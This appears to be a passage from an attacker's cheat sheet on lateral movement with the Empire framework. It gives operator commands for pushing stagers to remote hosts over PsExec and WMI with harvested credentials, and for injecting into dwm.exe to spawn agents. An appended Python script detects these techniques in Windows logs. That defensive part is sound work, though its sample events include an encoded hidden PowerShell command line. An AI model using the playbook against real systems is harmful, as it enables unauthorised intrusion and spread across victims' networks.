
 3. LATERAL MOVEMENT  

 Execute a stager on remote hosts using PsExec  

(empire: agentname) > creds

(empire: agentname) > usemodule lateral_movement/invoke_psexec

(empire: agentname) > info

(empire: agentname) > set Listener [listenername]

(empire: agentname) > set ComputerName [ipoftgt]    (IP address of target)

(empire: agentname) > execute

[If successful, this creates another agent.]

 Execute a stager on remote hosts using WMI  

(empire: agentname) > creds

(empire: agentname) > usemodule lateral_movement/invoke_wmi

(empire: agentname) > info

(empire: agentname) > set CredID [number]           (CredID from the creds output)

(empire: agentname) > set Listener [listenername]

(empire: agentname) > set ComputerName [ipoftgt]    (IP address of target)

(empire: agentname) > execute

[If successful, this creates another agent.]

 Injecting into the DWM process  

(empire: agentname) > ps dwm

--------------------------------------------------------------
ProcessName    PID    Arch    Username    Mem Using
dwm            612    x86     xxxx        xxx
--------------------------------------------------------------

(empire: agentname) > psinject [listenername] [PID]

(empire: agentname) > execute

[If successful, this creates another agent.]

(empire: agentname) > back

(empire: agents) > list

(empire: agents) > interact  [nameofagent]
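
Detection view of the three techniques above, as an added example that is not part of the original page: a small triage script for the target host's logs. It assumes events exported as dictionaries using the field names of the Windows System log (event 7045, service installed) and Sysmon (event 1, process creation; event 8, CreateRemoteThread). The sample events, host names and labels are constructed for illustration.

```python
import re

# Constructed sample events (not from the page), shaped like exported
# Windows System-log and Sysmon records from the hosts being defended.
EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "TestSvc01",
     "ImagePath": r"%COMSPEC% /C start /b powershell -NoP -W Hidden -Enc AAAA"},
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 1, "Computer": "WS02",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "Computer": "WS02",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 8, "Computer": "WS02",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\dwm.exe"},
]

# A service whose binary path is a shell one-liner rather than an executable.
SHELL = re.compile(r"(powershell|cmd(\.exe)?\s*/c|%comspec%)", re.I)
INTERPRETERS = ("powershell.exe", "cmd.exe")

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return a finding label for one event, or None if nothing matches."""
    eid = ev.get("EventID")
    if eid == 7045 and SHELL.search(ev.get("ImagePath", "")):
        return "service-install-runs-shell"   # PsExec-style remote service
    if (eid == 1 and basename(ev.get("ParentImage", "")) == "wmiprvse.exe"
            and basename(ev.get("Image", "")) in INTERPRETERS):
        return "wmi-spawned-interpreter"      # remote WMI process creation
    if eid == 8 and basename(ev.get("TargetImage", "")) == "dwm.exe":
        return "remote-thread-into-dwm"       # injection into dwm.exe
    return None

def hunt(events):
    """List (host, label) for every event that matches a heuristic."""
    return [(ev["Computer"], label) for ev in events
            if (label := classify(ev)) is not None]

if __name__ == "__main__":
    for host, label in hunt(EVENTS):
        print(f"{host}: {label}")
```

These are heuristics: management tooling can also start interpreters from WmiPrvSE.exe, so baseline each rule against normal activity before alerting on it.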
